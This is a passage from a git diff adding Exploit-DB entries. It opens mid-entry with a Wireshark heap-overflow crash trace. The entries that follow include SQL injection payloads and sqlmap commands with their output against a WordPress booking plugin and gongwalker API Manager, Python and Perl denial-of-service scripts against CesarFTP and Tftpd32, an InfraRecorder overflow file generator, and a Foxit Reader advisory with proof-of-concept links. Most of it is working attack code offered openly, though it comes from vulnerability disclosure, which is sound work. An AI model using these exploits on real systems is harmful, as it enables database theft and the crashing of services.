+    #16 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+    #17 0x5264eb in process_packet wireshark/tshark.c:3728:5
+    #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+    #19 0x515daf in main wireshark/tshark.c:2197:13
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/epan/dissectors/packet-ber.c:3990:17 in dissect_ber_constrained_bitstring
+Shadow bytes around the buggy address:
+  0x0ffbf6ac0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffbf6ac0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffbf6ac0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffbf6ac0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffbf6ac0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0ffbf6ac0f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ffbf6ac0f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ffbf6ac0f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ffbf6ac0f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ffbf6ac0f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ffbf6ac0f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==6953==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11828. Attached are two files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39327.zip
+
--- a/platforms/php/webapps/39319.txt
+++ b/platforms/php/webapps/39319.txt
@ -0,0 +1,77 @@
+# Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Shortcode SQL injection
+# Date: 2016-01-24
+# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
+# Exploit Author: Joaquin Ramirez Martinez [i0 security-lab]
+# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Vendor: CodePeople.net
+# Vebdor URI: http://codepeople.net
+# Version: 1.1.23
+# OWASP Top10: A1-Injection
+# Tested on: windows 10 + firefox + sqlmap 1.0.
+
+===================
+PRODUCT DESCRIPTION
+===================
+"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
+a calendar**. The booking form is linked to a **PayPal** payment process.
+
+You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
+where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
+that can be accepted for each time-slot."
+
+(copy of readme file)
+
+
+======================
+EXPLOITATION TECHNIQUE
+======================
+remote
+
+==============
+SEVERITY LEVEL
+==============
+
+critical
+
+================================
+TECHNICAL DETAILS && DESCRIPTION
+================================
+
+A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.20.
+
+The flaw was found in the function to run when a shortcode is found within a page in the wordpress site.
+The function mentioned use unsanitized attributes and a user authenticated as a editor, autor or 
+administrator (compromised) can exploit this vulnerability by adding crafted shortcodes on a page or post.
+
+The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, 
+an attacker can compromise the entire web server.
+
+================
+PROOF OF CONCEPT
+================
+
+An attacker(editor, autor or administrator) can embed into a post the following shortcode...
+
+[CPABC_APPOINTMENT_LIST calendar="-1 or sleep(10)#"]
+
+... and the post will take ten seconds loading.
+
+==========
+ CREDITS
+==========
+
+Vulnerability discovered by:
+	Joaquin Ramirez Martinez [i0 security-lab]
+	strparser[at]gmail[dot]com
+	https://www.facebook.com/I0-security-lab-524954460988147/
+	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
+
+
+========
+TIMELINE
+========
+
+2016-01-08 vulnerability discovered
+2016-01-24 reported to vendor
+2016-01-25 released appointment-booking-calendar 1.1.24
+2016-01-26 full disclosure
--- a/platforms/php/webapps/39320.txt
+++ b/platforms/php/webapps/39320.txt
@ -0,0 +1,48 @@
+gongwalker API Manager v1.1 - Blind SQL Injection
+
+# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
+# Date: 2016-01-25
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/gongwalker/ApiManager
+# Software Link: https://github.com/gongwalker/ApiManager.git
+# Version: v1.1
+# Tested on: Debian
+
+# =================== Vulnerability Description =================== #
+Api Manager's index.php used tag parameters is vulnerable
+http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1
+
+# ========================= SqlMap Query ========================== #
+sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag
+
+# ================= SqlMap Result(get My Test DB) ================= #
+Parameter: tag (GET)
+    Type: boolean-based blind
+    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+    Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb
+
+    Type: AND/OR time-based blind
+    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
+    Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
+---
+[21:14:21] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Apache 2.4.10
+back-end DBMS: MySQL 5.0.11
+[21:14:21] [INFO] fetching database names
+[21:14:21] [INFO] fetching number of databases
+[21:14:21] [INFO] resumed: 25
+[21:14:21] [INFO] resumed: information_schema
+[21:14:21] [INFO] resumed: "
+[21:14:21] [INFO] resumed: ""
+[21:14:21] [INFO] resumed: '
+[21:14:21] [INFO] resumed: ''
+[21:14:21] [INFO] resumed: '''
+[21:14:21] [INFO] resumed: api
+[21:14:21] [INFO] resumed: blackcat
+[21:14:21] [INFO] resumed: edusec
+
+...
+
+
--- a/platforms/windows/dos/39274.py
+++ b/platforms/windows/dos/39274.py
@ -0,0 +1,32 @@
+#!/usr/bin/env python
+#-*- coding:utf-8 -*-
+# Exploit Title     	: CesarFTP 0.99g -(XCWD)Remote BoF Exploit
+# Discovery by  	    	: Irving Aguilar
+# Email			: im.aguilar@protonmail.ch
+# Discovery Date    	: 18.01.2016
+# Tested Version    	: 0.99g
+# Vulnerability Type  : Denial of Service (DoS)
+# Tested on OS      	: Windows XP Professional SP3 x86 es
+
+import socket
+
+
+buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
+target = '192.168.1.73'
+port = 21
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect = s.connect((target, port))
+print '[*] Target: ' + target
+print '[*] Port: ' + str(port)
+s.recv(1024)
+
+s.send('USER ftp\r\n')
+s.recv(1024)
+
+s.send('PASS ftp\r\n')
+s.recv(1024)
+
+s.send( buffer  + '\r\n')
+print '[+] Buffer sent'
+s.close()
--- a/platforms/windows/dos/39329.py
+++ b/platforms/windows/dos/39329.py
@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/67076/info
+
+InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
+
+InfraRecorder 0.53 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+# Exploit Title: InfraRecorder Unicode Buffer Overflow
+# Version: version 0.53
+# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
+# Tested on: Windows XP sp2
+# Exploit Author: Osanda Malith 
+'''
+We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
+you can build a successful exploit.
+'''
+'''
+Click Edit -> Import -> import our buffer
+'''
+junk = "A"*262
+nseh = "BB"
+seh = "CC"
+junk2 = "D"*20000
+file=open("Exploit.m3u","w")
+file.write(junk)
+file.close()
+#EOF
--- a/platforms/windows/dos/39330.txt
+++ b/platforms/windows/dos/39330.txt
@ -0,0 +1,66 @@
+#####################################################################################
+
+Application: Foxit Reader PDF Parsing Memory Corruption
+
+Platforms: Windows
+
+Versions: 7.2.8.1124 and earlier
+
+Author: Francis Provencher of COSIG
+
+Website: http://www.protekresearchlab.com/
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
+
+(http://en.wikipedia.org/wiki/Foxit_Reader)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-18: Francis Provencher from Protek Research Lab’s found the issue;
+2016-01-02: Foxit Security Response Team confirmed the issue;
+2016-01-21: Foxit fixed the issue;
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader.
+
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+A specially crafted PDF can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability
+
+to execute arbitrary code under the context of the current process.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-02.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39330.zip
+
+###############################################################################
--- a/platforms/windows/dos/39331.pl
+++ b/platforms/windows/dos/39331.pl
@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/67404/info
+
+Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.
+
+The following products are vulnerable:
+
+Tftpd32 4.5
+Tftpd64 4.5
+
+#!/usr/bin/perl -w
+ 
+use IO::Socket;
+ 
+for (my $j = 0; $j < 2; $j++)
+{
+    sleep(2);
+    for (my $i = 0; $i < 1500; $i++)
+    {
+        $st_socket = IO::Socket::INET->new(Proto=>'udp', 
+PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
+     
+        $p_c_buffer = "\x0c\x0d" x 10;
+     
+        print $st_socket $p_c_buffer;
+     
+        close($st_socket);
+ 
+        print "sent " . $i . "\n";
+    }
+}
+ 
+exit;
+